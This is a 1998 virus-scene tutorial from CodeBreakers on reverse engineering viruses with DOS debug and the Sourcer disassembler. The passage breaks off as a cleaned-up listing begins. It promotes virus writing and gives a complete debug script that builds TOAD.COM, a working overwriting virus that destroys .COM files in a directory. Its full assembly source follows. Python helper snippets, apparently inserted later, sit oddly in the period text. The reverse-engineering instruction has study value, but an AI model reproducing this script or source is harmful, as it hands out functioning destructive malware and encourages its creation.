**************************************************************************

               Reverse Engineering: The Viral Approach.

                          By HornyToad & Opic             
			   
		     A CodeBreakers Production, (C) 1998                   
		        (http://www.Codebreakers.org)        
     
**************************************************************************                    

   Technology is advancing at an alarming rate every day.  In order to keep
up with the mainstream, industry programmers have had to utilize
software reverse engineering to stay abreast of important advances.  In
a world of a million buzz words, 'reverse engineering' has made a place
for itself as a respectable activity.  Chuckling, I wonder if a thief
will eventually be called an acquisition technician.  Reverse
engineering is simply a method of prying into software to steal other
programmers' techniques.  We're not passing judgement on this practice;
quite the contrary, we're very proud to be "engineers".  In the field of
virus writing and cracking, however, we tend to use the word disassembly
more often than reverse engineering.

   As the title indicates, the majority of this text will be devoted to
sparking interest in disassembling virus code.  Disassembly can also be
very helpful to the cracker and in general any professional programmer.
The cracker might use the disassembled code to extract and change
passwords and access privileges.  The professional programmer will most
likely be using the reverse engineering techniques to view others'
techniques and advances in programming.  The virus writer will most
likely be following in the footsteps of the professional programmer.
Who knows, that professional programmer might be a virus writer.  Let's
face it, if you want to learn how to program, do you want to rely on a
boring underpaid teacher to inspire you?  Or, would you like to learn
how to program by creating a virus or hacking program?  Trust me, virus
writing is fascinating and challenging.
   
   The art of virus disassembly and examination has been a practice
covered in a veil of ambiguity for quite a long time in the virus (and
even more so in the anti-virus) community.  And there is a logical reason
for this when you consider it:

On the side of the VX community:

"If anyone knows how to disassemble and debug my virus, they can learn my
techniques (which many virus writers don't want) as well as the fact
that AV can more easily scan for and disinfect the virus after examination."

On the side of the AV:

"If people understand how viruses work, and can even write their
own disinfection routines, or remove a virus infection manually then the
mystical hysteria that a viral infection brings can no longer be used to
my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough).

   So no matter which side of the fence you stand on, it should be clear
that virus disassembly should be a major part of your viral studies.
If you are a member of the AV community and find yourself in conflict
with the fact that you are reading a tutorial which comes from the side
of the VX, take heart!  The AV community will teach you the exact same
thing that we are teaching you in this tutorial...**for a price** (as
usual).  600 pounds is the last figure we saw for a cute little luncheon
with a complimentary diskette with some virus from the 80's and some
shareware AV program.  So take your pick.  We personally find the VX
side to be more noble, working in the pursuit of knowledge, as the AV
works in pursuit of the all-encompassing '$' sign.

   The virus community has undergone many changes in the past 10 years.
In the beginning, darkness covered the abyss... This beginning
passage from the Bible described the state of virus source code in the
late 80's and early 90's.  The push in the virus community was to
release virus executables, rather than revealing the source code.
Therefore, in order for the knowledge to spread throughout the
underground, coders relied on disassemblies.  Disassemblies were often
very crude in those days and rarely worked.  They did, however, shed
light on the virus writer's strategy, which, for the most part, was
enough to guide beginners in the right direction.  Over the years, the
focus of the virus community has changed.  Currently, the most common
practice is to publish source code along with the executable.  In fact,
many virus writers prefer to publish only the source code.  The
intellectual advances are becoming more important to the coders than the
destructive actions of the executable.  We prefer to see the
coder's original source, rather than an executable.  Even though we have
test machines for watching how a virus works, viewing the original
source is the most precise method of learning the virus writer's
techniques.
   Unfortunately, this change in strategy, releasing the source code, has
led to the weakening of disassembly skills, primarily in the use of the
debugger.  A debug program is one that allows you to manipulate and view
memory locations, registers, and individual program instructions. The
DOS debug program is a powerful tool for prying open executables and
exploiting the source code.  We must footnote that a thorough knowledge of
assembly language is a necessity in order to fully exploit debug.  This
article assumes that you are familiar with the basic assembly
instructions.  Our primary goal in writing this article is to spawn
interest in the reader to disassemble executables.  Don't be afraid to
uncover the secrets of the original programmer.

Debug

   There are many fine disassemblers and debuggers on the market.  If you
are willing to pay the big bucks, take a look at such programs as Sourcer,
IDA, and SoftIce.  Before you go out there and spend a lot of money on a
big name program, take a look at the one that you already have, Debug.  No, we're
not crazy.  Look in your \windows\command directory.  We'll bet it's
there.  If not, do a search of your dos files, it's hiding somewhere on
your drive.  Go to a dos prompt and type debug.  You should see the
debug prompt "-" on the next line.  Debug is loaded into memory and is
ready to use.  To quit out of debug, press "Q" then <enter>.

Let's first take a quick look at the debug commands:

*Hint*  All numbers passed to debug are assumed to be hex.  You do not
need to add the "h" at the end of the number.  We would recommend buying
a calculator that handles hex conversion.
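
If no hex calculator is at hand, the conversion can also be done in a
few lines of a scripting language.  This is only a small sketch in
Python (our choice for illustration, it is not part of debug); the
values are the program length and load offset used later in this text.

```python
# Convert between the hex notation debug uses and plain decimal.
length_hex = "B4"                   # a value as debug prints it (no "h")
length_dec = int(length_hex, 16)    # parse the text as base 16
print(length_hex, "hex is", length_dec, "decimal")

offset_dec = 256                    # a decimal value we want to give debug
offset_hex = format(offset_dec, "X")  # upper-case hex, no prefix or suffix
print(offset_dec, "decimal is", offset_hex, "hex")
```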

*Hint*  Please find a copy of the MS-DOS Users Guide.  It is very helpful
for learning some of the basics about DOS operations.  It also contains a
very informative guide to debug usage.  All of the debug commands are
explained with examples.  A must for your library!
 
(A)ssemble- Allows you to input assembly statements and translates them
into machine code.  Type "A" and press <enter>.  You will be returned an
address in the form of segment:offset.  The default offset for this
command is 100.

(C)ompare- In order to compare two areas of memory, type "c memLocA
range memLocB".  This command defaults with the data segment.  The
memory contents will be displayed side by side.
 
(D)isplay-  Used simply to view a memory location.  Again the default
register is DS for this command, but you can specify any segment you
want.  For example, "-D CS:100 <enter>", displays 80 hex (128 decimal)
bytes, the default, beginning at CS:100.  A length other than the default
can be specified by including "L<length>" in the command line, for
example, "-D CS:100 L100".

(E)nter- Allows you to enter data or machine code into a specified
location. Typing:
        E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
will enter this line of code starting at address cs:100.

(F)ill- Useful for filling a memory location with a specified value.
 Type:
-f 100 500 'Codebreakers Rule!'
This will fill the memory locations from 100 to 500 with some important
words to remember.  Type 'd 100' to see them.

(G)o- Executes the program loaded into memory to a specified
breakpoint. 

(H)exadecimal- This is your handy dandy hex calculator.  Enter 'H
<valueA> <valueB>', and debug will return the hex sum and difference of
the two values.  Very useful!

(I)nput- displays a byte from a port address.

(L)oad- Very useful command!  This command allows you to load a program
or disk sectors into debug.  Name the file with (N)ame first, then "-L"
loads it into memory.  "-L <address> <drive> <startSector> <length>" or
"-L 100 0 10 20" loads 20 (hex) sectors from drive A (0), starting at
sector 10, to CS:100.  The default segment for this command is CS.

(M)ove- moves contents of one location to another.  Default is DS.
Syntax: -m ds:100 l50 DS:300  This will move from ds:100, 50 bytes to
location ds:300.

(N)ame- Names a file that you entered.

(O)utput- Sends a byte to a port.

(P)roceed- Executes through a routine.

(Q)uit- Quits debug.

(R)egister- Displays the registers and the next instruction.

(S)earch- Searches a specified range through default DS for a "string"
or data entity.  Returns location if found.

(T)race- Begins executing a program in single step mode. A range can be
specified.

(U)nassemble- Produces assembly instructions for a specified range or
simply 32 bytes when unspecified.  Default is CS.

(W)rite- Writes a (N)amed file to disk, in essence, this is your save
command.
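
To get a feel for what two of the commands above print, here is a rough
Python sketch of (H)exadecimal and (D)isplay.  It is an imitation for
study purposes, not debug's actual code.  The function names are our
own, the segment value 278E is simply the one from our test machine,
and the dump routine assumes the starting offset sits on a 16 byte
boundary.

```python
def debug_h(a: int, b: int) -> str:
    """Imitate 'H a b': 16-bit sum and difference, four hex digits each."""
    total = (a + b) & 0xFFFF          # results wrap around at 16 bits
    diff = (a - b) & 0xFFFF
    return f"{total:04X}  {diff:04X}"


def dump_row(segment: int, offset: int, row: bytes) -> str:
    """Format up to 16 bytes the way a 'D' line looks."""
    hex_bytes = [f"{b:02X}" for b in row]
    left = " ".join(hex_bytes[:8])
    right = " ".join(hex_bytes[8:])
    hex_part = left + ("-" + right if right else "")
    # Non-printable bytes are shown as '.' in the text column.
    text = "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in row)
    return f"{segment:04X}:{offset:04X}  {hex_part:<47}   {text}"


def dump(data: bytes, segment: int = 0x278E, offset: int = 0x100) -> list:
    """Split data into 16-byte rows (offset assumed 16-byte aligned)."""
    return [dump_row(segment, offset + i, data[i:i + 16])
            for i in range(0, len(data), 16)]


print(debug_h(0x1B4, 0x100))
for line in dump(b"ions! You have i", offset=0x140):
    print(line)
```

Comparing the printed row with a real "d" listing is a quick way to
check that you are reading the hex and text columns correctly.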


   We think that the best way to learn how to use debug is through a
practical example.  In general people always learn faster when they have 
hands-on training.  Well, that's what you are going to get.  And guess what, 
you are going to perform your first virus disassembly!  We have specifically
chosen a small uncomplicated virus for this first example.  Below, you
will see a debug script to create an instructional virus from the
CodeBreakers VX magazine.  Study the commands.  The first line (N)ames a
program called TOAD.COM starting at CS:100.  As you can see, the next
several lines (E)nter machine code through CS:01B3.  The line, "RCX" and
subsequent line, "00B4" loads the program length into CX.  When in doubt
as to the length of the program, look at the offset at the beginning of
the last line, in this case 01B0.  Then count single bytes across to the
final piece of code entered, "24", 4 bytes across, which puts the end of
the program at 01B4.  Subtract the starting offset of 100 and you have
the length, B4.  Easy.  The next line
(W)rites the program (TOAD.COM).  The final line quits out of debug.  We
hope that you are already realizing the wealth of information that you
can get from using the debug program.  Save the information below in a
file called "toad.txt".  At a dos prompt, type: "debug toad.txt
<enter>".  Debug will then execute the instructions in toad.txt and
present you with a functional virus, toad.com.  Do not worry about this
virus spreading and destroying your system, it won't.  This is a very
simple COM overwriting virus that only touches the COM files in the
directory it is run from.  Follow my instructions and nothing will
happen.
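
The length arithmetic described above is easy to get wrong by one line
or one byte, so here it is as a tiny Python sketch.  The function name
and parameters are our own invention for illustration; the only facts
used are the ones stated above (last line at offset 01B0, 4 bytes on
it, program loaded at 100).

```python
def program_length(last_line_offset: int, bytes_on_last_line: int,
                   load_offset: int = 0x100) -> int:
    """Length of a COM image entered with (E)nter lines in a debug script."""
    end = last_line_offset + bytes_on_last_line   # first offset past the data
    return end - load_offset                      # COM files load at 100h


length = program_length(0x1B0, 4)
print("RCX value:", format(length, "04X"))
```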

 N TOAD.COM
 E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
 E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E
 E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A
 E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74
 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69
 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20
 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69
 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69
 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74
 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E
 E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79
 E 01B0 2E 0A 0D 24
 RCX
 00B4
 W
 Q


   In a way, I cheated by giving you the machine code to the virus ahead
of time.  Normally, the task of the disassembler (coder) would be to
produce source from only the executable.  Anyway, now that you have the
working virus executable, let's get to work.
 Load toad.com into a debug session by typing:

A:\debug toad.com         <-    type
-                         <-    debug prompt (ready for action)

   Remember that executable code begins after the <P>rogram <S>egment
<P>refix at CS:100. What we therefore need to do is view the <R>egisters
and find out the length of toad.com.  Typing "r" at the debug prompt,
allows you to see the values of the registers.  The important one that
we are looking for first is the initial value of CX.  CX holds the
length of the program.  In this case B4 (or 180) bytes.  Take a moment
to study the different registers.  Notice that the "r" command also
printed the assembly code for the first instruction.  278E:0100 is the
segment:offset address for CS:100, or the beginning of the program.
Notice also that the IP is set to 100.  "B44E" disassembles to the
assembly instruction "MOV AH,4E".

 -r
 AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
 DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
 278E:0100 B44E          MOV     AH,4E
 -
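
If you capture debug's output to a file, the register values can be
pulled out of it mechanically.  The following Python sketch is one
possible way to do that; the function names are ours, and the physical
address formula is the standard 8086 real mode one (segment times 16
plus offset), which we assume applies to your test machine.

```python
import re

R_OUTPUT = """\
AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
"""


def parse_registers(text: str) -> dict:
    """Return {'AX': 0, 'CX': 180, ...} from the output of the 'r' command."""
    pairs = re.findall(r"\b([A-Z]{2})=([0-9A-F]{4})\b", text)
    return {name: int(value, 16) for name, value in pairs}


def linear_address(segment: int, offset: int) -> int:
    """Real-mode physical address of segment:offset."""
    return (segment << 4) + offset


regs = parse_registers(R_OUTPUT)
print("program length:", regs["CX"], "bytes")
print("entry point   :", format(linear_address(regs["CS"], regs["IP"]), "05X"))
```

The flag names at the end of the second line (NV UP EI ...) carry no
"=" sign, so the pattern skips them.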

 Now that we have the length of the program, we can <D>isplay, or dump
the program's machine code to the screen.  This is accomplished by
<D>isplaying from CS:100 for a <l>ength of b4.  Observe below that the
data portion of the virus follows directly after the executable
portion.  This is the first clue that we have as to the offset for the
data structure.  From the beginning of the data portion of the code, any
assembly instructions that debug "translates" for you will be bogus.
 Type:      

 -d cs:100 lb4

278E:0100  B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E   .N3../..!r...=..
278E:0110  00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E   ..!..@.......!.>
278E:0120  CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A   .!.O.....5..!. *
278E:0130  2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74   .com.Congratulat
278E:0140  69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69   ions! You have i
278E:0150  6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20   nfected all the
278E:0160  43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69   COM files in thi
278E:0170  73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69   s ..directory wi
278E:0180  74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74   th the Toad inst
278E:0190  72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E   ructional virus.
278E:01A0  20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79   Have a nice day
278E:01B0  2E 0A 0D 24                                       ...$
-


   In both the above listing and below, it is easy to determine the end of
the program instructions.  In this case,  find the CD 20 (int 20)
instruction which terminates the virus.  Directly after the CD 20 at
location CS:012D, the first sign of a data portion appears, hex 2A, the
* character.
                          
 -u cs:100 l2f
 278E:0100 B44E          MOV     AH,4E
 278E:0102 33C9          XOR     CX,CX
 278E:0104 BA2F01        MOV     DX,012F
 278E:0107 CD21          INT     21
 278E:0109 721B          JB      0126
 278E:010B B8023D        MOV     AX,3D02
 278E:010E BA9E00        MOV     DX,009E
 278E:0111 CD21          INT     21
 278E:0113 93            XCHG    BX,AX
 278E:0114 B440          MOV     AH,40
 278E:0116 B9B400        MOV     CX,00B4
 278E:0119 BA0001        MOV     DX,0100
 278E:011C CD21          INT     21
 278E:011E B43E          MOV     AH,3E
 278E:0120 CD21          INT     21
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
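
Looking for the terminating CD 20 by eye works for a listing this
small.  For larger dumps the same search can be sketched in Python as
below.  The function name is hypothetical, and the result is only a
hint: the bytes CD 20 can just as well turn up inside an operand or
inside data, so always confirm the split in the disassembly.  The
sample bytes are the last few code bytes and first data bytes from the
dump above, starting at offset 0126.

```python
def split_code_and_data(image: bytes, load_offset: int = 0x100,
                        terminator: bytes = b"\xCD\x20"):
    """Return (offset of terminator, offset of first byte after it)."""
    index = image.find(terminator)        # first occurrence only
    if index < 0:
        return None                       # no INT 20 found at all
    start = load_offset + index
    return start, start + len(terminator)


tail = bytes.fromhex("B409BA3501CD21CD202A2E636F6D00")
result = split_code_and_data(tail, load_offset=0x126)
print([format(offset, "04X") for offset in result])
```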


  It is important that you are aware of what bogus assembly instructions
look like.  This is where an understanding of basic assembly is
required.  Take a look below at code before the break.  It is easy to
decipher what the actual instructions are.  You might even recognize
what the virus is doing from this little snip of code.  Then, after the
int 20, all hell breaks loose.  What the hell is this "sub ch,[6f63]" ?
What an eye sore!  When code begins to look like this, you are going to
be forced to draw one or more of these conclusions:  1. The code segment
has ended.   2. The data segment might be starting.  3. We may be
dealing with code polymorphism or encryption.  There are other
possibilities, but for the sake of the beginner, at a minimum, recognize
that a change has occurred.
                             

 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
 -------------------------------------------------------------
 278E:012F 2A2E636F      SUB     CH,[6F63]
 278E:0133 6D            DB      6D
 278E:0134 00436F        ADD     [BP+DI+6F],AL
 278E:0137 6E            DB      6E
 278E:0138 67            DB      67
 278E:0139 7261          JB      019C
 278E:013B 7475          JZ      01B2
 278E:013D 6C            DB      6C
 278E:013E 61            DB      61
 278E:013F 7469          JZ      01AA
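
One crude way to back up the "this looks bogus" feeling is to check how
many of the bytes in question are printable ASCII.  The Python sketch
below is a heuristic of our own, not a rule: real code contains some
printable bytes too, and encrypted data usually contains few, so treat
the number as a hint and nothing more.  The two samples are the bytes
on either side of the break shown above.

```python
def printable_ratio(chunk: bytes) -> float:
    """Fraction of bytes in the printable ASCII range 20h-7Eh."""
    if not chunk:
        return 0.0
    printable = sum(1 for b in chunk if 0x20 <= b <= 0x7E)
    return printable / len(chunk)


code_tail = bytes.fromhex("B409BA3501CD21CD20")        # 0126-012E
data_head = bytes.fromhex("2A2E636F6D00436F6E67726174756C617469")  # 012F on

print("before the break:", round(printable_ratio(code_tail), 2))
print("after the break :", round(printable_ratio(data_head), 2))
```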



  Once you are comfortable with moving around a program within debug, it
is now time to formulate an intelligent looking disassembly.  We'd like to
classify disassembly into two different forms, the utility disassembly
and the work of art.  The utility disassembly is when someone simply
copies the debug output into a file and gives it an asm extension.  This
code can look quite ugly and may not even work.  The work of art is
when someone adds assembler specific directives to the asm file,
gives meaningful symbolic names,  translates data, and comments the
code. For example:

1. Assembler specific instructions:
If you are using TASM, for example, and the virus is of COM file type,
include such directives as:

 code    segment
	 assume  cs:code,ds:code
	 org     100h
	  :
	  :
 code    ends
	 end     start

You might even want to include TASM compile instructions like:

     ;TASM nameOfVirus.ASM
     ;TLINK /t nameOfVirus.OBJ

Adding the above instructions/structures to the code will aid people
who might not be TASM literate in assembling the virus.

2. Meaningful symbolic names:
During disassembly, whether through debug or an expensive disassembler,
symbolic names of procedures, labels, and variables are lost.  Debug
translates them as actual memory addresses.  Disassemblers often assign
them with meaningless names like "loc_1".  Take a look at the examples
below.  Which one of them would be easier for a beginner to understand?
They both accomplish the same end result, although the code on top
is more self-explanatory and is easier for the beginner to
understand.

 find_first:
	 mov     ah,4eh
	 xor     cx,cx
	 lea     dx,comFile
	 int     21h
	 jc      outMessage
 or

 loc_1:
     mov ah,4Eh
     xor cx,cx
     mov dx,12Fh
     int 21h
     jc loc_2


3. Translate data:
Once more, which one looks better?  Enough said.  It might be tedious
breaking out the ASCII code chart and translating the data section, but
when someone looks at your disassembly, they will appreciate it.

 db '*.com', 0
 db 'Congratulations! You have infect'

 or

 db  2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h
 db  74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h
 db  6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h
 db  63h, 74h

4. Comment your code:
We have had many programming teachers say that you can never put too many
comments into your code.  We have heard an equal number say that there
only need to be a few concise comments.  It's a never ending battle. We
would tend to recommend including too many comments rather than not enough.
Many beginners are given the advice that, in order to learn assembly,
you have to study source code.  That's fine and dandy, but when you're
not necessarily comfortable with assembly, looking at naked code can
give you a headache.  Try to provide enough comments so that the
beginner can understand how each line fits in to the program's
operation.  For example:
 
 mov ah,3Eh           ;function 3Eh-close file
 int 21h              ;go dos!

 mov ah,4Fh           ;function 4Fh-find next file
 jmp find_file        ;jump to find next file to infect
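
The data translation from point 3 above does not have to be done with
an ASCII chart.  Below is a small Python sketch that turns raw bytes
into a db line.  The function name and the exact output style are our
own choices (every non-text byte is written as hex with an "h"
suffix); adjust it to whatever your assembler prefers.

```python
def to_db(data: bytes) -> str:
    """Render bytes as one 'db' line: quoted text runs plus hex values."""
    parts = []
    run = ""
    for b in data:
        # Printable ASCII goes into a quoted run; the quote character
        # itself is emitted as a number so the string stays well formed.
        if 0x20 <= b <= 0x7E and b != 0x27:
            run += chr(b)
            continue
        if run:
            parts.append(f"'{run}'")
            run = ""
        text = f"{b:02X}h"
        if text[0].isalpha():
            text = "0" + text        # hex constants must start with a digit
        parts.append(text)
    if run:
        parts.append(f"'{run}'")
    return "db " + ", ".join(parts)


print(to_db(bytes.fromhex("2A2E636F6D00")))
print(to_db(bytes.fromhex("2E0A0D24")))
```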



Essentially, that's all there is to it.  Extract the assembly
instructions and data through the use of debug into an asm file.  Tidy
the code up, add comments and turn the file into a work of art by
following the few pointers that we stated above.  We realize that this is
very short and sweet, but in order to include everything about debugging
operations, we would need to write a book.  There are many more
techniques which need to be implemented to counteract anti-debugging
techniques.  Thankfully, many of the more powerful disassemblers on the
market today can defeat the majority of anti-debugging techniques.
After trying hard to sell you on debug, we have to admit that we more
often use Turbo Debugger by Borland for viewing code.  Essentially, both
programs accomplish the same thing.  But, Turbo Debugger's delivery is
very sweet.  As you trace through your code, in separate windows you can
view the flags and registers changing dynamically.  There is a window in
the lower right-hand corner of the screen that allows you to view the
stack as values are pushed and popped off of it.  Breakpoints are easy
to set, so that you can execute your program up to a certain point,
checking the registers and flags to see the results.  All in all, Turbo
Debugger is a fascinating program and learning tool. We highly recommend
it.

   Now, let's take a quick look at the same virus executable, but this time
we'll put it under a slightly different microscope: a disassembler.
What do we need to get started? We are going to start out with the most
simple and effective setup we can. So first things first: go collect the
tools that you don't have from the list below.
Tools we need:

1)A good disassembler (duh) or two. Many people will argue that this
disassembler is better than that one and this one sucks because that
one...blah, blah, blah. You're boring us! The fact is that a disassembler
program is a tool: just a tool. You use it WITH your intellect and can make
it as valuable or as worthless as you wish. There are a lot of disassemblers
out there but this is the one we are going to be working with, because first
of all it is relatively easy to use and second it is fairly accurate and
widely available:

Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is
probably an even better disassembler: IDA. But it is much more difficult
to acquire, and is VERY large in size. Feel free to try the demo
version, but you will not be able to save your disassemblies (very cheap on
their part), so we chose not to use examples from it in this tutorial.
However, we would suggest that you cross reference (double-check) your
disassemblies from Sourcer with those from IDA as well as through a debugger.
This will help you in recreating a more precise disassembly.

2)The Ralf Brown Int list-this is IMPERATIVE in disassembly!

You can acquire these at:
http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html
or:
http://www.simtel.net/pub/simtelnet/msdos/info/
(the file intwin**.zip -currently intwin57.zip...still updating)

3)TOAD.COM -overwriting virus which can be found in debug script in the
debugging portion of this tutorial or from Codebreakers VX Zine #1
available at:
http://www.codebreakers.org.

  Alright, now we are going to start from the ground up.  What is
a disassembly? Simply, it is drawing the source code of an executable
program from the program itself.  This is EXTREMELY useful in learning
programming tricks and examining code that you do not understand and do not
have the source code to.  It is even more useful to the virus writer, who can
acquire through the WWW or his/her contacts a copy of just about any virus in
executable form, but for whom coming across the source code can be impossible.

  Now let us interject some of the problems we see today with most
virus disassemblies and what it truly means to do a disassembly.  Most
viral disassemblies that you will download off the net are very, very
sloppy code which in almost any instance won't even compile (and often, if
they do, will function NOTHING like the original virus did). This is
usually due to one simple factor: the executable was run through a
disassembler without being examined, corrected, altered, etc. In other
words, the person doing the disassembly just ran it through the program and
zipped it up. This is an almost useless and definitely fruitless practice
which we would like to see an end to. What does it mean to do a "real"
disassembly? Well, the most accurate disassemblies are done through debug
with notepad open, recording step by step what the virus does. BUT, many of
us do not have the time to do such disassemblies, and we will argue that a
disassembly done through one of today's disassembler programs, combined with
some foot work on the part of the rev engineer and mixed with a bit of
debugging (to clarify the gray areas of the disassembly), can do AS good if
not a BETTER job than the 100% debug route.

The three most important aspects of doing a disassembly of a program
are:

1)Know how to set the options on your disassembler to create the most
accurate disassembly possible.

2)Having another disassembler and debugger
to cross reference with (i.e. a lot of disassemblers make errors and it is
good to use more than one to get a more accurate "picture" of the program
you are disassembling).

3)Do NOT just leave the disassembly as it lies when it comes out of the
disassembler.  The ASM file that comes from the disassembler is the RAW
material from which we will sculpt a working, functioning likeness of the
original virus.  We will need to clean it up, get rid of junk inserted
by the disassembler, get rid of locational numbers, and give labels more
descriptive names. And while we are doing that we will intuitively begin
to get a better sense of the virus we are disassembling.  You should have
the Ralf Brown files open during your entire "cleaning process" to refer to.

Constantly double check strange int's and sub-functions, and make the code
"human" again.  We find the easiest way to illustrate this process is to
show it to you step by step. We will show you examples from Sourcer 7.0, what
settings and options we have chosen, and how they look in their RAW form
straight from the disassembler.
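
The cross referencing recommended in point 2 above can be partly
mechanized.  The Python sketch below strips comments and spacing from
two listings and prints where they differ.  It is a rough aid under
several assumptions of ours: both listings use the same assembler
syntax, comments start with ";", and no ";" appears inside a quoted
string.  The function names and the two short sample listings are made
up for the demonstration.

```python
import difflib


def normalize(line: str) -> str:
    """Drop the comment, lower-case the rest and collapse whitespace."""
    code = line.split(";", 1)[0]
    return " ".join(code.lower().split())


def compare(listing_a, listing_b):
    """Unified diff of two listings after normalization."""
    a = [n for n in map(normalize, listing_a) if n]
    b = [n for n in map(normalize, listing_b) if n]
    return list(difflib.unified_diff(a, b, fromfile="first",
                                     tofile="second", lineterm=""))


first = ["mov     ax,3D02h",
         "mov     dx,data_1e      ; equate outside the program",
         "int     21h"]
second = ["MOV AX,3D02h",
          "MOV DX,9Eh",
          "INT 21h"]

for line in compare(first, second):
    print(line)
```

Every line the diff reports is a spot to check by hand in a debugger;
here the only difference is an equate name standing in for the value
9Eh.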

1)Disassembly of TOAD.COM using Sourcer 7.0 Settings:

Input file:TOAD.COM

Target assembler: TASM 5.0 (We know that TASM was what was used to
originally assemble this virus, so we will choose the most current version of
TASM, as a newer version almost always supports code from older versions but
not vice versa.  It is worthwhile to investigate what assembler the author
of the virus you are disassembling preferred, as it will aid you in your
entire disassembly.)

Also choose: (functional match).

Output filename: TOAD.ASM

File format: press F so that .asm is displayed as the output format, so we
can do away with those annoying segment addresses and whatnot that Sourcer
will otherwise insert.

Remarks: all. Why not? Let's see what Sourcer can help us with.

Label type: We choose decimal. They are all annoying, but this one is
easiest for us; this is pretty much just preference here.

OK, that's a pretty decent setup for Sourcer, let's see what it came up with:

 ---------------------------------------------------------------------------

PAGE  59,132

;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
;UU                                                                      UU
;UU                             TOAD                                     UU
;UU                                                                      UU
;UU      Created:   19-Oct-97                                            UU
;UU      Passes:    5          Analysis Options on: none                 UU
;UU                                                                      UU
;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

target          EQU   'T5'                      ; Target assembler: TASM-5.0

include  srmacros.inc


; The following equates show data references outside the range of the program.

data_1e         equ     9Eh

seg_a           segment byte public
		assume  cs:seg_a, ds:seg_a


		org     100h

toad            proc    far

start:
		mov     ah,4Eh                  ; 'N'
loc_1:
		xor     cx,cx                   ; Zero register
		mov     dx,12Fh
		int     21h                     ; DOS Services  ah=function 4Fh
						;  find next filename match
		jc      loc_2                   ; Jump if carry Set
		mov     ax,3D02h
		mov     dx,data_1e
		int     21h                     ; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		xchg    bx,ax
		mov     ah,40h                  ; '@'
		mov     cx,0B4h
		mov     dx,100h
		int     21h                     ; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov     ah,3Eh
		int     21h                     ; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		mov     ah,4Fh                  ; 'O'
		jmp     short loc_1
loc_2:
		mov     ah,9
		mov     dx,offset data_4        ; ('Congratulations! You hav')
		int     21h                     ; DOS Services  ah=function 09h
						;  display char string at ds:dx
		int     20h                     ; DOS program terminate
		db      '*.com', 0
data_4          db      'Congratulations! You have infect'
		db      'ed all the COM files in this ', 0Ah
		db      0Dh, 'directory with the Toad ins'
		db      'tructional virus. Have a nice da'
		db      'y.', 0Ah, 0Dh, '$'

toad            endp

seg_a           ends



		end     start
----------------------------------------------------------------------------

  O.K., not bad, not bad at all really. If we like, we can attempt to
recompile this code and see if it compiles and runs properly. It looks
fairly legible, so what we can do is run it through IDA to see if we get any
differences in code construction or content. While we may not see much
here because this is a simple overwriting virus, we can assure you that you
will see it in more complex code (we will talk about some common disassembler
flaws and errors later on). Go ahead and run Toad.com through the demo
version of IDA (if you have it) and you'll see very little variation in
code. Which means we can move on to the next step of cleaning and commenting
the code. Here is the code after we have sifted through it, removed the junk
Sourcer includes, renamed locations and data labels, and cleared
up odd bits of code.

----------------------------------------------------------------------------
;**************************************************************************
;                  TOAD Overwriting Virus 
;
;           Disassembly By Opic [CodeBreakers '98]
;
;                Recompilable with TASM/TLINK
;
;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about
;this virus as it is very uninteresting by nature, and has little value
;other then as an instructive device.
;**************************************************************************

virus           segment byte public
		assume  cs:virus, ds:virus
		org     100h
